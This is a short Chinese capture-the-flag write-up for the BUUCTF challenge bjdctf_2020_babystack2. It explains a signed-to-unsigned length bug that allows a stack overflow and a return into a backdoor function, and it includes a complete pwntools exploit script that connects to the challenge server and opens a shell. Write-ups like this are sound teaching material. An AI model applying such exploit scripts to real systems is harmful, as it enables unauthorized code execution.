buuctf中的bjdctf_2020_babystack2

首先checksec检查一下保护机制：

-64位程序

-开启了栈不可执行保护

接下来使用反汇编工具IDA进行分析：

发现read函数可触发栈溢出，并且从左边发现存在后门函数，但是read读取的长度受到nbytes这个变量的限制，发现这个变量的数据类型在下面被转化为unsigned int即无符号整数类型，当我们将-1转化为unsigned int类型时，会变成unsigned int的最大值，所以在上面我们只需要输入-1即可在下面触发栈溢出，这里顺便算出偏移量为：0x10+0x8 = 24

backdoor函数内部：

拿到backdoor函数地址：0x400726

然后编写exp攻击脚本：

from pwn import * context(arch='amd64', os='linux', log_level='debug') #io = process('./pwn') # 在本地运行程序。 # gdb.attach(io) # 启动 GDB io = connect('node5.buuoj.cn',28893) # 与在线环境交互。 backdoor = 0x400726 offset = 0x10 + 0x8 io.recvuntil(b'[+]Please input the length of your name:\n') io.sendline(b'-1') io.recvuntil(b'[+]What\'s u name?\n') payload = b'a'*offset + p64(backdoor) io.sendline(payload) io.interactive()

这是运行结果：

拿到shell后手动输入cat flag即可